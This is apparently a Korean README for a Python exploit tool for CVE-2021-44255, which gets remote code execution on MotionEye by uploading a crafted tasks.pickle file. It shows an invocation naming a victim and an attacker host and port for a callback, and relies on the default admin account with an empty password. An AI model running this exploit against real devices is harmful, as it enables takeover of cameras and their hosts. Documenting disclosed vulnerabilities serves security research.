
MotionEye에서 RCE를 가능하게 하는 tasks.pickle 파일을 업로드하는 Python 3 스크립트. CVE-2021-44255
MotionEye에서 RCE를 가능하게 하는 tasks.pickle 파일을 업로드하는 Python 3 스크립트입니다. 관리자 자격 증명이 필요하므로 그리 큰 문제가 아니어야 합니다. 불행히도 MotionEye/MotionEyeOS는 종종 기본 자격 증명으로 실행되는 것을 발견할 수 있습니다.
예제:
main.py --victim 192.168.1.2 --attacker 192.168.1.3:4444
victim과 attacker는 ip:port 형식입니다. 단, 포트가 80인 경우 포트를 생략할 수 있습니다. 이는 빈 비밀번호와 함께 기본 사용자 이름 admin을 사용합니다. 대체 사용자 이름/비밀번호를 위한 CLI 옵션도 있습니다. 자세한 내용은 코드를 참조하세요.
CVE-2021-44255
이 문제 및 다른 문제에 대한 설명은 https://www.pizzapower.me/2021/10/09/self-hosted-security-part-1-motioneye 를 참조하세요.